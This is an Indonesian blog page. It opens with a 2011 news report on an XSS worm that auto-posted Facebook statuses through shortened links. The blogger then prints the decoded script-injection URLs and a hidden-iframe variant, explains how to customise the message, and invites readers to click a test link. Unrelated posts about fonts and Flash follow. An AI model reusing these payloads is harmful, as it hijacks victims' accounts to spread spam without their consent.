Status FB Otomatis setelah KLIK, itu Malware GAN.

Para pengguna situs jejaring sosial Facebook dua hari belakangan ini diresahkan oleh serangan script jahat yang menyebar luas. Dari pemantauan, diketahui bahwa serangan tersebut menyebar dengan memanfaatkan teknik XSS (Cross Site Scripting).

Jika pengguna mengklik link yang diberikan – dan umumnya menggunakan url shortener seperti bit.ly, tinyurl.com, goo.gl dan lain-lain – maka korban akan diantarkan ke halaman situs yang sebelumnya telah disiapkan mengandung eksploitasi XSS.

Menurut Alfons Tanujaya, pengamat virus dan keamanan dunia maya dari Vaksincom, pembuat XSS ini jelas orang Indonesia dan mengikuti perkembangan berita, khususnya sepakbola di Indonesia.

“Dengan memanfaatkan isu terkini dan menjadikannya rekayasa sosial (social engineering) yang canggih, maka tidak heran kalau banyak orang yang tertarik terhadap link yang dijanjikan dan berharap melihat sesuatu yang lucu dari link tersebut,” ucap Alfons pada keterangannya, 29 Maret 2011.

Tetapi, Alfons menyebutkan, alih-alih gambar lucu yang di dapatkan, yang terjadi malah pengakses link ini menjadi korban XSS. “Secara otomatis, script tersebut akan melakukan posting pada akun Facebook-nya,” ucapnya.

Meski demikian, Alfons menyebutkan, melihat metode XSS yang digunakan, kemungkinan besar script ini tidak melakukan aksi mencuri password.

“Tindakan yang diambil pelaku mirip dengan aksi yang dilakukan oleh penyebar Firesheep,” kata Alfons. “Mereka mencuri cookie sesama pengguna Wifi lain tanpa mengetahui passwordnya dan menggunakannya untuk login ke akun-akun Facebook, Twitter dan Yahoo Mail yang tidak menggunakan pengamanan https,” ucapnya.


Namun, kata Alfons, demi alasan keamanan dan berjaga-jaga, Anda yang pernah mengklik link ini disarankan untuk mengganti password akun Facebook Anda.

Seperti diketahui, alat yang digunakan, yakni URL shortener atau penyingkat URL sendiri sebenarnya diciptakan untuk tujuan yang baik. URL shortener dapat menyingkat alamat URL yang panjang menjadi sangat pendek. Tetapi ibarat dua sisi mata pedang, URL shortener menjadi marak digunakan oleh spammer, pembuat virus dan malware.

“Berhubung alamat asli URL shortener ini sama sekali tidak bisa di lihat dan dengan sekali klik link yang diberikan oleh URL shortener tersebut, maka kita akan diantarkan ke alamat situs yang telah di daftarkansebelumnya oleh pembuat URL shortener ini,” ucap Alfons.

Jika situs tersebut mengandung kode jahat seperti XSS yang sedang marak di Facebook saat ini, maka script ini akan mampu membuat korbannya secara otomatis melakukan posting secara otomatistanpa disadari oleh pemilik akun.

Karena itu, pengguna internet diharapkan untuk berhati-hati saat mendapatkan link yang mengandung URL shortener seperti bit.ly, tinyURL.com, goo.gl dan penyingkat URL lainnya.





Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :


http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms[0].submit();}%3C/script%3E
 

Huh …tinyurl-nya berfungsi untuk menyembunyikan javascriptnya
kalau kita decode jadilah seperti ini


http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

Dasar orang isenk  Bukan virus, tapi ya mengubah satus kita sesuai denan message value di atas.
Update : ini juga

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();}</script>

untuk membuat ini cukup mudah cukup kopi link diatas kemudian ganti bagian message.value.
contoh :
ini testing dari mamakey http://tinyurl.com/mamakey
maka tertulis :

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’<script>window.onload%3Dfunction(){document.forms[0].message.value%3D’ini testing dari mamakey %3AD http%3A%2F%2Ftinyurl.com%2Fmamakey’%3Bdocument.forms[0].submit()%3B}<%2Fscript>’

Silahkan saja klik link diatas  dan hapus pada wall anda
update lagi :
sekarang mereka tidak memakai tinyURL tapi memakai IFRAME untuk melakukan scripting.. huh jahat. Ketemu scriptnya disini :

<iframe id="CrazyDaVinci" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt=%27%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.forms%5B0%5D.message.value=%27Masih ada orang yg mau terkenal dan kaya raya dengan memuja setan, termasuk salah satu grup band terkenal di Indonesia ckckckck.... baca selengkapnya di http://tinyurl.com/4fqudco %21%21%21%27;document.forms%5B0%5D.submit%28%29;%7D%3C/script%3E" style="display: none;"></iframe>

sumber : klik


Perjalanan Monyet Cowok. Hahaha...


Hahaha..... Buat Lucu-Lucuan Aja dan Maaf Klo Gak Lucu. Sekalian Ngasah Flashnya. OK
ini kisah monyet dari masih Bujang Sampai Udah Punya anak 3. hahaha..
Cekidot Gan KLIK
atau buka link ini : http://swfup.com/view/uvuw


Sekilas klo diYoutube Kayak Gni-nih Gan. Cekidot :



..Font Standar menjadi Luar Biasa..


*  Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray

* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray

*Ade K Naray
* Ade K Naray
* Ade K Naray
* Ade K Naray
   terkadang suka bosen dengan FONT TEKS yang itu2 aja.. binggung juga mo create kayak gimana biar terlihat lebih menarik. Nyantai gan... tinggal instal aja fontnya dan langsung otomatis masuk dilist office kita.
         Cekidot n donlod di  sini tinggal  KLIK atau   Fonts.rar


Belajar Macromedia Flash Profesional 8


 Cekidot Gan... Masih belajar multimedia flash prof 8.
Di KLIK disini gan. wahh... klo di seriusin kayaknya enak juga nih.. tapi sempet gak ya..?? apa jadiin hobi aja???



Keep Trying.... GodLuck
 


YOUTUBENYA

Kalimat Motivasi Pembangkit Semangat

Motivasi                                                                                                   

Proposal Manajemen Proyek

Tugas Proposal Baru                                                                                                   

Quiz IMK Ergonomi

Quis IMK                                                                                                   

Search Engine

PRODUK KAMU DISINI

ads ads